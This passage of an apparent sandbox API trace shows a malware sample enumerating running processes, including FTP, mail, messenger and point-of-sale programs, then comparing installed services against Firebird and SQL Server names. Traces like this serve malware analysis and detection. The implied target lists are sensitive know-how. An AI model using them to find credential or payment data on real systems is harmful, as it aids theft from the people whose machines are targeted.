th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0173.654] lstrlenW (lpString="coreftp.exe") returned 11 [0173.654] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0173.655] lstrlenW (lpString="far.exe") returned 7 [0173.655] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0173.663] lstrlenW (lpString="filezilla.exe") returned 13 [0173.663] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0173.664] lstrlenW (lpString="flashfxp.exe") returned 12 [0173.664] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0173.665] lstrlenW (lpString="fling.exe") returned 9 [0173.665] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0173.666] lstrlenW (lpString="foxmailincmail.exe") returned 18 [0173.666] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0173.666] lstrlenW (lpString="gmailnotifierpro.exe") returned 20 [0173.667] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0173.667] lstrlenW (lpString="icq.exe") returned 7 [0173.667] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0173.668] lstrlenW (lpString="leechftp.exe") returned 12 [0173.668] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0173.669] lstrlenW (lpString="ncftp.exe") returned 9 [0173.669] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0173.670] lstrlenW (lpString="notepad.exe") returned 11 [0173.670] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0173.671] lstrlenW (lpString="operamail.exe") returned 13 [0173.671] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0173.672] lstrlenW (lpString="pidgin.exe") returned 10 [0173.672] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0173.673] lstrlenW (lpString="scriptftp.exe") returned 13 [0173.673] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0173.674] lstrlenW (lpString="skype.exe") returned 9 [0173.674] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0173.675] lstrlenW (lpString="smartftp.exe") returned 12 [0173.675] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0173.676] lstrlenW (lpString="thunderbird.exe") returned 15 [0173.676] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0173.677] lstrlenW (lpString="totalcmd.exe") returned 12 [0173.677] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0173.678] lstrlenW (lpString="trillian.exe") returned 12 [0173.678] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0173.679] lstrlenW (lpString="webdrive.exe") returned 12 [0173.679] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0173.680] lstrlenW (lpString="whatsapp.exe") returned 12 [0173.680] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0173.681] lstrlenW (lpString="winscp.exe") returned 10 [0173.681] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0173.682] lstrlenW (lpString="yahoomessenger.exe") returned 18 [0173.682] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0173.682] lstrlenW (lpString="active-charge.exe") returned 17 [0173.682] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0173.683] lstrlenW (lpString="accupos.exe") returned 11 [0173.683] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0173.684] lstrlenW (lpString="afr38.exe") returned 9 [0173.684] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0173.685] lstrlenW (lpString="aldelo.exe") returned 10 [0173.685] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0173.686] lstrlenW (lpString="ccv_server.exe") returned 14 [0173.686] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0173.686] lstrlenW (lpString="centralcreditcard.exe") returned 21 [0173.686] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xee8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0173.687] lstrlenW (lpString="creditservice.exe") returned 17 [0173.687] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0173.688] lstrlenW (lpString="edcsvr.exe") returned 10 [0173.688] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0173.689] lstrlenW (lpString="fpos.exe") returned 8 [0173.689] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0173.690] lstrlenW (lpString="isspos.exe") returned 10 [0173.690] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0173.691] lstrlenW (lpString="mxslipstream.exe") returned 16 [0173.691] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1010, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0173.691] lstrlenW (lpString="omnipos.exe") returned 11 [0173.691] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0173.692] lstrlenW (lpString="spcwin.exe") returned 10 [0173.692] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0173.693] lstrlenW (lpString="spgagentservice.exe") returned 19 [0173.693] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0173.693] lstrlenW (lpString="utg2.exe") returned 8 [0173.693] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1060, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_community.exe")) returned 1 [0173.695] lstrlenW (lpString="lb_community.exe") returned 16 [0173.695] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="miniature.exe")) returned 1 [0173.695] lstrlenW (lpString="miniature.exe") returned 13 [0173.695] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="humanity-volumes-enables.exe")) returned 1 [0173.696] lstrlenW (lpString="humanity-volumes-enables.exe") returned 28 [0173.696] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operation-environments.exe")) returned 1 [0173.697] lstrlenW (lpString="operation-environments.exe") returned 26 [0173.697] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0173.697] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0173.697] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0173.698] lstrlenW (lpString="taskhostw.exe") returned 13 [0173.698] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0173.699] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0173.699] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0173.702] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0173.702] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x12b0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0173.703] lstrlenW (lpString="conhost.exe") returned 11 [0173.703] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0173.704] lstrlenW (lpString="sppsvc.exe") returned 10 [0173.704] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0173.704] lstrlenW (lpString="dllhost.exe") returned 11 [0173.704] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0173.705] lstrlenW (lpString="wdgmug.exe") returned 10 [0173.705] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1160, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1260, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0173.705] lstrlenW (lpString="cmd.exe") returned 7 [0173.706] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1160, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0173.706] lstrlenW (lpString="conhost.exe") returned 11 [0173.706] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x764, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0173.707] lstrlenW (lpString="sc.exe") returned 6 [0173.707] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x764, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0173.707] lstrlenW (lpString="conhost.exe") returned 11 [0173.707] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0173.708] lstrlenW (lpString="WMIADAP.exe") returned 11 [0173.708] Process32NextW (in: hSnapshot=0x348, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0173.708] CloseHandle (hObject=0x348) returned 1 [0173.708] Sleep (dwMilliseconds=0x1f4) [0174.611] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x74ee08 [0174.612] EnumServicesStatusExW (in: hSCManager=0x74ee08, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 0 [0174.613] GetLastError () returned 0xea [0174.613] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1d8a) returned 0x770a50 [0174.614] EnumServicesStatusExW (in: hSCManager=0x74ee08, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x770a50, cbBufSize=0x1d8a, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x770a50, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 1 [0174.615] CloseServiceHandle (hSCObject=0x74ee08) returned 1 [0174.615] lstrlenW (lpString="Appinfo") returned 7 [0174.615] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0174.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0174.616] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0174.616] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0174.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0174.616] lstrlenW (lpString="AppXSvc") returned 7 [0174.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0174.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0174.616] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0174.616] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0174.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0174.616] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0174.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0174.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0174.616] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0174.616] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0174.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0174.616] lstrlenW (lpString="Audiosrv") returned 8 [0174.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0174.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0174.616] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0174.616] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0174.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0174.616] lstrlenW (lpString="BFE") returned 3 [0174.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0174.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0174.616] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0174.616] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0174.616] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0174.616] lstrlenW (lpString="BITS") returned 4 [0174.616] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0174.616] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0174.616] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0174.616] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0174.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0174.617] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0174.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0174.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0174.617] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0174.617] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0174.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0174.617] lstrlenW (lpString="CDPSvc") returned 6 [0174.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0174.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0174.617] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0174.617] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0174.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0174.617] lstrlenW (lpString="ClickToRunSvc") returned 13 [0174.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0174.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0174.617] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0174.617] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0174.617] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0174.617] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0174.617] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0174.617] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0174.617] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0174.617] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0174.617] lstrcmpiW 